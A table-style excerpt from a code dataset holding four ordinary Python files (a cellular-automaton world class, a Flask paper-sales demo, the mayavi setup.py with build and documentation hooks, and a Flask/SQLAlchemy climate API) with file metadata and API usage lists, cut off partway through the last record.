seq_id
string | text
string | repo_name
string | sub_path
string | file_name
string | file_ext
string | file_size_in_byte
int64 | program_lang
string | lang
string | doc_type
string | stars
int64 | dataset
string | pt
string | api
list |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
36780535651
|
from typing import List, Union, Iterator, Tuple
from cell import Cell
class World:
NEIGHT = (
(-1, -1),
(-1, 0),
(-1, 1),
(0, -1),
(0, 1),
(1, -1),
(1, 0),
(1, 1)
)
def __init__(self, width, height):
self.w = width
self.h = height
self.cells = self._new_world()
self.new_cells = None
def add_cell(self, x: int, y: int, cell: Cell):
self.cells[y][x] = cell
def _new_world(self) -> List[List[Union[Cell, None]]]:
return [
[None for x in range(self.w)]
for y in range(self.h)
]
def _iter_by(self, cells) -> Iterator[Tuple[int, int, Cell]]:
for y in range(self.h):
for x in range(self.w):
yield x, y, cells[y][x]
def _neight(self, cx, cy) -> Iterator[Cell]:
for dx, dy in self.NEIGHT:
x = cx + dx
y = cy + dy
if not (0 <= x < self.w):
x %= self.w
if not (0 <= y < self.h):
y %= self.h
if self.cells[y][x] is not None:
yield self.cells[y][x]
def _neight_count(self, cx, cy) -> int:
return len(tuple(self._neight(cx, cy)))
def step(self):
self.new_cells = self._new_world()
for x, y, cell in self._iter_by(self.cells):
neight = self._neight_count(x, y)
if cell is None:
cell = Cell.generate_new(list(self._neight(x, y)), neight)
if (cell is not None) and (not cell.is_birth(neight)):
cell = None
else:
if not cell.is_alive(neight) or cell.is_dead():
cell = None
self.new_cells[y][x] = cell
if cell:
cell.age += 1
self.cells = self.new_cells
def clean(self):
self.cells = self._new_world()
def stats(self):
types = {}
for x, y, cell in self:
if cell is None:
continue
key = tuple(cell.birth), tuple(cell.live)
types.setdefault(key, 0)
types[key] += 1
return types
def print(self):
for y in range(self.h):
for x in range(self.w):
cell = self.cells[y][x]
if cell:
print("#", end="")
else:
print("-", end="")
print()
# print(AsciiTable([[""]] + self.cells).table)
def __iter__(self):
yield from self._iter_by(self.cells)
def __getitem__(self, item: Union[Tuple[int, int]]):
return self.cells[item[1]][item[0]]
|
AzaubaevViktor/evo_life
|
world.py
|
world.py
|
py
| 2,710 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "cell.Cell",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "cell.Cell",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "typing.Iterator",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "cell.Cell",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "typing.Iterator",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "cell.Cell",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "cell.Cell.generate_new",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "cell.Cell",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "cell.is_birth",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "cell.is_alive",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "cell.is_dead",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "cell.age",
"line_number": 70,
"usage_type": "attribute"
},
{
"api_name": "cell.birth",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "cell.live",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "typing.Union",
"line_number": 102,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 102,
"usage_type": "name"
}
] |
71840538747
|
from flask import Flask
from flask import render_template
from flask import Response, request, jsonify
app = Flask(__name__)
current_id = 4
sales = [
{
"id": 1,
"salesperson": "James D. Halpert",
"client": "Shake Shack",
"reams": 1000
},
{
"id": 2,
"salesperson": "Stanley Hudson",
"client": "Toast",
"reams": 4000
},
{
"id": 3,
"salesperson": "Michael G. Scott",
"client": "Computer Science Department",
"reams": 10000
},
]
clients = [
"Shake Shack",
"Toast",
"Computer Science Department",
"Teacher's College",
"Starbucks",
"Subsconsious",
"Flat Top",
"Joe's Coffee",
"Max Caffe",
"Nussbaum & Wu",
"Taco Bell",
];
non_ppc_people = [
"Phyllis",
"Dwight",
"Oscar",
"Creed",
"Pam",
"Jim",
"Stanley",
"Michael",
"Kevin",
"Kelly"
]
ppc_people = [
"Angela"
]
@app.route('/infinity')
def infinity(name=None):
return render_template('cu-paper-infinity.html', sales=sales, clients=clients)
@app.route('/ppc')
def ppc(name=None):
return render_template('ppc.html', non_ppc_people=non_ppc_people, ppc_people=ppc_people)
@app.route('/save_sale', methods=['GET', 'POST'])
def save_sale():
global current_id
global sales
global clients
json_data = request.get_json()
salesperson = json_data["salesperson"]
client = json_data["client"]
reams = json_data["reams"]
current_id += 1
new_sale_log = {
"id": current_id,
"salesperson": salesperson,
"client": client,
"reams": reams
}
sales.append(new_sale_log)
if client not in clients:
clients.append(client)
return jsonify(sales=sales, clients=clients)
@app.route('/delete_sale', methods=['GET', 'POST'])
def delete_sale():
global sales
delete_id = request.get_json()
del sales[delete_id]
return jsonify(sales=sales)
@app.route('/move_to_non_ppc', methods=['GET', 'POST'])
def move_to_non_ppc():
global non_ppc_people
global ppc_people
name = request.get_json()
if name not in non_ppc_people:
non_ppc_people.append(name)
ppc_people.remove(name)
return jsonify(non_ppc_people=non_ppc_people, ppc_people=ppc_people)
@app.route('/move_to_ppc', methods=['GET', 'POST'])
def move_to_ppc():
global non_ppc_people
global ppc_people
name = request.get_json()
if name not in ppc_people:
ppc_people.append(name)
non_ppc_people.remove(name)
return jsonify(non_ppc_people=non_ppc_people, ppc_people=ppc_people)
if __name__ == '__main__':
app.run(debug = True)
|
haoshuai999/User-Interface
|
cu-paper-infinity&ppc/app.py
|
app.py
|
py
| 2,393 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 71,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 93,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 104,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 117,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 123,
"usage_type": "call"
}
] |
30354475241
|
import setuptools
from setuptools import Command
try:
import numpy
from numpy.distutils.command import build, install_data, build_src
from numpy.distutils.core import setup
HAS_NUMPY = True
except ImportError:
HAS_NUMPY = False
from distutils.command import build, install_data
from distutils.core import setup
import io
import os
import time
import subprocess
import shutil
import re
import sys
import traceback
from os.path import (abspath, basename, dirname, exists, getmtime, isdir,
join, split)
from distutils.command import clean
from distutils import log
from setuptools.command import develop
MODE = 'normal'
if len(sys.argv) >= 2 and \
('--help' in sys.argv[1:] or
sys.argv[1] in ('--help-commands', 'egg_info', '--version',
'clean', 'sdist')):
MODE = 'info'
info = {}
fname = join('mayavi', '__init__.py')
exec(compile(open(fname).read(), fname, 'exec'), info)
DEFAULT_HTML_TARGET_DIR = join('docs', 'build')
DEFAULT_INPUT_DIR = join('docs', 'source',)
class GenDocs(Command):
description = (
"This command generates generated part of the documentation "
"when needed. It's run automatically before a build_docs, and that's "
"the only time it needs to be run."
)
user_options = [
('None', None, 'this command has no options'),
]
def latest_modified(self, the_path, filetypes='', ignore_dirs=''):
"""Traverses a path looking for the most recently modified file
Parameters
----------
the_path : string
Contains path to be traversed or filename to be inspected.
filetypes : string
Regular expression pattern of files to examine. If specified, other
files are ignored. Otherwise, all files are examined.
ignore_dirs : string
Regular expression pattern of directories to be ignored. If ignore
specified, all directories are walked.
Returns
-------
latest_time : float
Modification time of latest_path.
latest_path : string
Most recently modified file.
Description
-----------
"""
file_re = re.compile(filetypes)
dir_re = re.compile(ignore_dirs)
if not exists(the_path):
return 0, the_path
if isdir(the_path):
latest_time = 0
latest_path = the_path
for root, dirs, files in os.walk(the_path):
if ignore_dirs != '':
# This needs to iterate over a copy of the list. Otherwise,
# as things get removed from the original list, the indices
# become invalid.
for dir in dirs[:]:
if dir_re.search(dir):
dirs.remove(dir)
for file in files:
if filetypes != '':
if not file_re.search(file):
continue
current_file_time = getmtime(join(root, file))
if current_file_time > latest_time:
latest_time = current_file_time
latest_path = join(root, file)
return latest_time, latest_path
else:
return getmtime(the_path), the_path
def mlab_reference(self):
""" If mayavi is installed, run the mlab_reference generator.
"""
# XXX: This is really a hack: the script is not made to be used
# for different projects, but it ended up being. This part is
# mayavi-specific.
mlab_ref_dir = join(DEFAULT_INPUT_DIR, 'mayavi', 'auto')
source_path = 'mayavi'
sources = '(\.py)|(\.rst)$'
excluded_dirs = '^\.'
target_path = mlab_ref_dir
target_time = self.latest_modified(target_path,
ignore_dirs=excluded_dirs)[0]
if (self.latest_modified(source_path, filetypes=sources,
ignore_dirs=excluded_dirs)[0] > target_time
or self.latest_modified('mlab_reference.py')[0] > target_time
or not exists(join('docs', 'source', 'mayavi', 'auto',
'mlab_reference.rst'))):
try:
from mayavi import mlab
from mayavi.tools import auto_doc
print("Generating the mlab reference documentation")
os.system('python mlab_reference.py')
except:
pass
def example_files(self):
""" Generate the documentation files for the examples.
"""
mlab_ref_dir = join(DEFAULT_INPUT_DIR, 'mayavi', 'auto')
source_path = join('examples', 'mayavi')
sources = '(\.py)|(\.rst)$'
excluded_dirs = '^\.'
target_path = mlab_ref_dir
target_time = self.latest_modified(target_path,
ignore_dirs=excluded_dirs)[0]
script_file_name = join('docs', 'source', 'render_examples.py')
if (self.latest_modified(source_path, filetypes=sources,
ignore_dirs=excluded_dirs)[0] > target_time
or self.latest_modified(script_file_name)[0] > target_time
or not exists(join('docs', 'source', 'mayavi', 'auto',
'examples.rst'))
):
try:
from mayavi import mlab
from mayavi.tools import auto_doc
print("Generating the example list")
subprocess.call('python %s' %
basename(script_file_name), shell=True,
cwd=dirname(script_file_name))
except:
pass
def run(self):
self.mlab_reference()
self.example_files()
def initialize_options(self):
pass
def finalize_options(self):
pass
class BuildDocs(Command):
description = \
"This command generates the documentation by running Sphinx. " \
"It then zips the docs into an html.zip file."
user_options = [
('None', None, 'this command has no options'),
]
def make_docs(self):
if os.name == 'nt':
print("Please impelemnt sphinx building on windows here.")
else:
subprocess.call(['make', 'html'], cwd='docs')
def run(self):
self.make_docs()
def initialize_options(self):
pass
def finalize_options(self):
pass
# Functions to generate the docs
def list_doc_projects():
""" List the different source directories under DEFAULT_INPUT_DIR
for which we have docs.
"""
source_dir = join(abspath(dirname(__file__)),
DEFAULT_INPUT_DIR)
source_list = os.listdir(source_dir)
# Check to make sure we're using non-hidden directories.
source_dirs = [listing for listing in source_list
if isdir(join(source_dir, listing))
and not listing.startswith('.')]
return source_dirs
def list_docs_data_files(project):
""" List the files to add to a project by inspecting the
documentation directory. This works only if called after the
build step, as the files have to be built.
returns a list of (install_dir, [data_files, ]) tuples.
"""
project_target_dir = join(DEFAULT_HTML_TARGET_DIR, project, 'html')
return_list = []
for root, dirs, files in os.walk(project_target_dir, topdown=True):
# Modify inplace the list of directories to walk
dirs[:] = [d for d in dirs if not d.startswith('.')]
if len(files) == 0:
continue
install_dir = root.replace(project_target_dir, join(project, 'html'))
return_list.append((install_dir, [join(root, f) for f in files]))
return return_list
def _tvtk_built_recently(zipfile, delay):
"""Returns True if the TVTK classes in zipfile was built in the last
delay seconds.
"""
if not os.path.exists(zipfile):
return False
ctime = os.stat(zipfile).st_ctime
tdiff = time.time() - ctime
return tdiff < delay
# Our custom distutils hooks
def build_tvtk_classes_zip():
MY_DIR = os.path.dirname(__file__)
zipfile = os.path.join(MY_DIR, 'tvtk', 'tvtk_classes.zip')
if _tvtk_built_recently(zipfile, delay=120):
print("Already built tvtk_classes.zip")
return
else:
print("Building tvtk_classes.zip")
sys.path.insert(0, MY_DIR)
import tvtk
tvtk_dir = 'tvtk'
sys.path.insert(0, tvtk_dir)
from setup import gen_tvtk_classes_zip
gen_tvtk_classes_zip()
sys.path.remove(tvtk_dir)
sys.path.remove(MY_DIR)
class MyBuild(build.build):
""" A build hook to generate the documentation.
We sub-class numpy.distutils' build command because we're relying on
numpy.distutils' setup method to build python extensions.
"""
def run(self):
build_tvtk_classes_zip()
build.build.run(self)
class MyBuildSrc(build_src.build_src):
"""Build hook to generate the TVTK ZIP files.
We do it here also because for editable installs, setup.py build is not
called.
"""
def run(self):
build_tvtk_classes_zip()
build_src.build_src.run(self)
class MyDevelop(develop.develop):
""" A hook to build the TVTK ZIP file on develop.
Subclassing setuptools' command because numpy.distutils doesn't
have an implementation.
"""
def run(self):
# Make sure that the 'build_src' command will
# always be inplace when we do a 'develop'.
self.reinitialize_command('build_src', inplace=1)
# tvtk_classes.zip always need to be created on 'develop'.
build_tvtk_classes_zip()
develop.develop.run(self)
class MyInstallData(install_data.install_data):
""" An install hook to copy the generated documentation.
We subclass numpy.distutils' command because we're relying on
numpy.distutils' setup method to build python extensions.
"""
def run(self):
install_data_command = self.get_finalized_command('install_data')
for project in list_doc_projects():
install_data_command.data_files.extend(
list_docs_data_files(project))
# make sure tvtk_classes.zip always get created before putting it
# in the install data.
build_tvtk_classes_zip()
tvtk_dir = 'tvtk'
install_data_command.data_files.append(
(tvtk_dir, [join(tvtk_dir, 'tvtk_classes.zip')]))
install_data.install_data.run(self)
class MyClean(clean.clean):
"""Reimplements to remove the extension module array_ext to guarantee a
fresh rebuild every time. The module hanging around could introduce
problems when doing develop for a different vtk version."""
def run(self):
MY_DIR = os.path.dirname(__file__)
ext_file = os.path.join(
MY_DIR,
"tvtk",
"array_ext" + (".pyd" if sys.platform == "win32" else ".so")
)
if os.path.exists(ext_file):
print("Removing in-place array extensions {}".format(ext_file))
os.unlink(ext_file)
clean.clean.run(self)
# Configure our extensions to Python
def configuration(parent_package=None, top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.set_options(
ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True,
)
config.add_subpackage('tvtk')
config.add_data_dir('mayavi/core/lut')
config.add_data_dir('mayavi/tests/data')
config.add_data_dir('mayavi/tests/csv_files')
config.add_data_dir('mayavi/tools/static')
# Image files.
for pkgdir in ('mayavi', 'tvtk'):
for root, dirs, files in os.walk(pkgdir):
if split(root)[-1] == 'images':
config.add_data_dir(root)
# *.ini files.
config.add_data_dir('tvtk/plugins/scene')
config.add_data_dir('mayavi/preferences')
return config
###########################################################################
# Similar to package_data, but installed before build
build_package_data = {'mayavi.images': ['docs/source/mayavi/_static/m2_about.jpg']}
# Install our data files at build time. This is iffy,
# but we need to do this before distutils kicks in.
for package, files in build_package_data.items():
target_path = package.replace('.', os.sep)
for filename in files:
shutil.copy(filename, target_path)
###########################################################################
# Build the full set of packages by appending any found by setuptools'
# find_packages to those discovered by numpy.distutils.
if HAS_NUMPY:
config = configuration().todict()
else:
# This is just a dummy so the egg_info command works.
config = {'packages': []}
packages = setuptools.find_packages(exclude=config['packages'] +
['docs', 'examples'])
config['packages'] += packages
if MODE != 'info' and not HAS_NUMPY:
msg = '''
Numpy is required to build Mayavi correctly, please install it first.
'''
print('*'*80)
print(msg)
print('*'*80)
raise RuntimeError(msg)
# The actual setup call
if __name__ == '__main__':
setup(
name='mayavi',
version=info['__version__'],
author="Prabhu Ramachandran, et al.",
author_email="[email protected]",
maintainer='ETS Developers',
python_requires='>=3.8',
maintainer_email='[email protected]',
url='http://docs.enthought.com/mayavi/mayavi/',
classifiers=[c.strip() for c in """\
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
Intended Audience :: Science/Research
License :: OSI Approved :: BSD License
Operating System :: MacOS
Operating System :: Microsoft :: Windows
Operating System :: OS Independent
Operating System :: POSIX
Operating System :: Unix
Programming Language :: C
Programming Language :: Python
Topic :: Scientific/Engineering
Topic :: Software Development
Topic :: Software Development :: Libraries
""".splitlines() if len(c.split()) > 0],
cmdclass={
# Work around a numpy distutils bug by forcing the use of the
# setuptools' sdist command.
'sdist': setuptools.command.sdist.sdist,
'build': MyBuild,
'build_src': MyBuildSrc,
'clean': MyClean,
'develop': MyDevelop,
'install_data': MyInstallData,
'gen_docs': GenDocs,
'build_docs': BuildDocs,
},
description='3D scientific data visualization library and application',
download_url=('https://www.github.com/enthought/mayavi'),
entry_points={
'gui_scripts': [
'mayavi2 = mayavi.scripts.mayavi2:main',
'tvtk_doc = tvtk.tools.tvtk_doc:main'
],
'envisage.plugins': [
'tvtk.scene = tvtk.plugins.scene.scene_plugin:ScenePlugin',
'tvtk.scene_ui = tvtk.plugins.scene.ui.scene_ui_plugin:SceneUIPlugin',
'tvtk.browser = tvtk.plugins.browser.browser_plugin:BrowserPlugin',
'mayavi = mayavi.plugins.mayavi_plugin:MayaviPlugin',
'mayavi_ui = mayavi.plugins.mayavi_ui_plugin:MayaviUIPlugin'
],
'tvtk.toolkits': [
'qt4 = tvtk.pyface.ui.qt4.init:toolkit_object',
'qt = tvtk.pyface.ui.qt4.init:toolkit_object',
'wx = tvtk.pyface.ui.wx.init:toolkit_object',
'null = tvtk.pyface.ui.null.init:toolkit_object',
]
},
extras_require=info['__extras_require__'],
include_package_data=True,
install_requires=info['__requires__'],
license="BSD",
long_description=io.open('README.rst', encoding='utf-8').read(),
platforms=["Windows", "Linux", "Mac OS-X", "Unix", "Solaris"],
zip_safe=False,
**config
)
|
enthought/mayavi
|
setup.py
|
setup.py
|
py
| 16,576 |
python
|
en
|
code
| 1,177 |
github-code
|
6
|
[
{
"api_name": "sys.argv",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "setuptools.Command",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "re.compile",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "os.walk",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "os.path.getmtime",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "os.path.getmtime",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 129,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 129,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 142,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "subprocess.call",
"line_number": 163,
"usage_type": "call"
},
{
"api_name": "os.path.basename",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "setuptools.Command",
"line_number": 180,
"usage_type": "name"
},
{
"api_name": "os.name",
"line_number": 191,
"usage_type": "attribute"
},
{
"api_name": "subprocess.call",
"line_number": 194,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 213,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 216,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 216,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 228,
"usage_type": "call"
},
{
"api_name": "os.walk",
"line_number": 230,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 235,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 236,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 244,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 244,
"usage_type": "attribute"
},
{
"api_name": "os.stat",
"line_number": 247,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 248,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 254,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 254,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 255,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 255,
"usage_type": "attribute"
},
{
"api_name": "sys.path.insert",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 261,
"usage_type": "attribute"
},
{
"api_name": "sys.path.insert",
"line_number": 264,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 264,
"usage_type": "attribute"
},
{
"api_name": "setup.gen_tvtk_classes_zip",
"line_number": 266,
"usage_type": "call"
},
{
"api_name": "sys.path.remove",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 267,
"usage_type": "attribute"
},
{
"api_name": "sys.path.remove",
"line_number": 268,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 268,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.build.build",
"line_number": 271,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.build",
"line_number": 271,
"usage_type": "name"
},
{
"api_name": "distutils.command.build.build.run",
"line_number": 281,
"usage_type": "call"
},
{
"api_name": "distutils.command.build.build",
"line_number": 281,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.build",
"line_number": 281,
"usage_type": "name"
},
{
"api_name": "numpy.distutils.command.build_src.build_src",
"line_number": 284,
"usage_type": "attribute"
},
{
"api_name": "numpy.distutils.command.build_src",
"line_number": 284,
"usage_type": "name"
},
{
"api_name": "numpy.distutils.command.build_src.build_src.run",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "numpy.distutils.command.build_src.build_src",
"line_number": 293,
"usage_type": "attribute"
},
{
"api_name": "numpy.distutils.command.build_src",
"line_number": 293,
"usage_type": "name"
},
{
"api_name": "setuptools.command.develop.develop",
"line_number": 296,
"usage_type": "attribute"
},
{
"api_name": "setuptools.command.develop",
"line_number": 296,
"usage_type": "name"
},
{
"api_name": "setuptools.command.develop.develop.run",
"line_number": 312,
"usage_type": "call"
},
{
"api_name": "setuptools.command.develop.develop",
"line_number": 312,
"usage_type": "attribute"
},
{
"api_name": "setuptools.command.develop",
"line_number": 312,
"usage_type": "name"
},
{
"api_name": "distutils.command.install_data.install_data",
"line_number": 315,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.install_data",
"line_number": 315,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 334,
"usage_type": "call"
},
{
"api_name": "distutils.command.install_data.install_data.run",
"line_number": 336,
"usage_type": "call"
},
{
"api_name": "distutils.command.install_data.install_data",
"line_number": 336,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.install_data",
"line_number": 336,
"usage_type": "name"
},
{
"api_name": "distutils.command.clean.clean",
"line_number": 339,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.clean",
"line_number": 339,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 344,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 344,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 346,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 346,
"usage_type": "attribute"
},
{
"api_name": "sys.platform",
"line_number": 349,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 352,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 352,
"usage_type": "attribute"
},
{
"api_name": "os.unlink",
"line_number": 354,
"usage_type": "call"
},
{
"api_name": "distutils.command.clean.clean.run",
"line_number": 356,
"usage_type": "call"
},
{
"api_name": "distutils.command.clean.clean",
"line_number": 356,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.clean",
"line_number": 356,
"usage_type": "name"
},
{
"api_name": "numpy.distutils.misc_util.Configuration",
"line_number": 362,
"usage_type": "call"
},
{
"api_name": "os.walk",
"line_number": 378,
"usage_type": "call"
},
{
"api_name": "os.path.split",
"line_number": 379,
"usage_type": "call"
},
{
"api_name": "os.sep",
"line_number": 396,
"usage_type": "attribute"
},
{
"api_name": "shutil.copy",
"line_number": 398,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 408,
"usage_type": "call"
},
{
"api_name": "distutils.core.setup",
"line_number": 425,
"usage_type": "call"
},
{
"api_name": "setuptools.command",
"line_number": 453,
"usage_type": "attribute"
},
{
"api_name": "io.open",
"line_number": 487,
"usage_type": "call"
}
] |
26602476689
|
import numpy as np
import pandas as pd
import datetime as dt
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func, inspect
from flask import Flask, jsonify
app = Flask(__name__)
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
measurement = Base.classes.measurement
station = Base.classes.station
session = Session(engine)
@app.route("/")
def home():
return (
f"Welcome to Sofie's OFFICIAL Climate App API!<br/>"
f"<br/>"
f"Available Routes are:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/>"
f"/api/v1.0/start (start date must be in mm-dd format) <br/>"
f"/api/v1.0/start/end (start & end dates must be in yyyy-mm-dd format) <br/>"
f"<br/>"
f"May Your Days Be Bright & Sunny, but Your Hair NEVER Frizzy!"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
lastDate = session.query(func.max(measurement.date)).all()[0][0]
lastDate = dt.datetime.strptime(lastDate, '%Y-%m-%d')
priorYear = lastDate - dt.timedelta(365)
result = session.query(measurement.date, measurement.prcp).filter(measurement.date>=priorYear).all()
precipitation = []
for date, prcp in result:
precipitation_dict = {}
precipitation_dict["date"] = date
precipitation_dict["prcp"] = prcp
precipitation.append(precipitation_dict)
return jsonify(precipitation)
@app.route("/api/v1.0/stations")
def stations():
results = session.query(station.station,station.name)\
.group_by(station.name)\
.order_by(station.name)\
.all()
stations = list(np.ravel(results))
return jsonify(stations)
@app.route("/api/v1.0/tobs")
def TObs():
lastDate = session.query(func.max(measurement.date)).all()[0][0]
lastDate = dt.datetime.strptime(lastDate, '%Y-%m-%d')
priorYear = lastDate - dt.timedelta(365)
results = session.query(measurement.tobs, measurement.date)\
.filter(measurement.station == 'USC00519281', measurement.date>=priorYear).all()
TObs = list(np.ravel(results))
return jsonify(TObs)
@app.route("/api/v1.0/<start>")
def start(start):
tmin = func.min(measurement.tobs)
tavg = func.avg(measurement.tobs)
tmax = func.max(measurement.tobs)
sel = [tmin, tavg, tmax]
result = session.query(*sel).filter(func.strftime("%m-%d", measurement.date) >= start).all()
start = []
for tmin, tavg, tmax in result:
start_dict = {}
start_dict["tmin"] = tmin
start_dict["tavg"] = tavg
start_dict["tmax"] = tmax
start.append(start_dict)
return jsonify(start)
@app.route("/api/v1.0/<start>/<end>")
def SnE(start, end):
tmin = func.min(measurement.tobs)
tavg = func.avg(measurement.tobs)
tmax = func.max(measurement.tobs)
sel = [tmin, tavg, tmax]
result = session.query(*sel).filter(measurement.date >= start).filter(measurement.date <= end).all()
end = []
for tmin, tavg, tmax in result:
end_dict = {}
end_dict["tmin"] = tmin
end_dict["tavg"] = tavg
end_dict["tmax"] = tmax
end.append(end_dict)
return jsonify(end)
if __name__ == "__main__":
app.run(debug=True)
|
SofiaAS1/SQLalchemy-Challenge
|
app.py
|
app.py
|
py
| 3,377 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.create_engine",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.ext.automap.automap_base",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.orm.Session",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func.max",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "datetime.timedelta",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
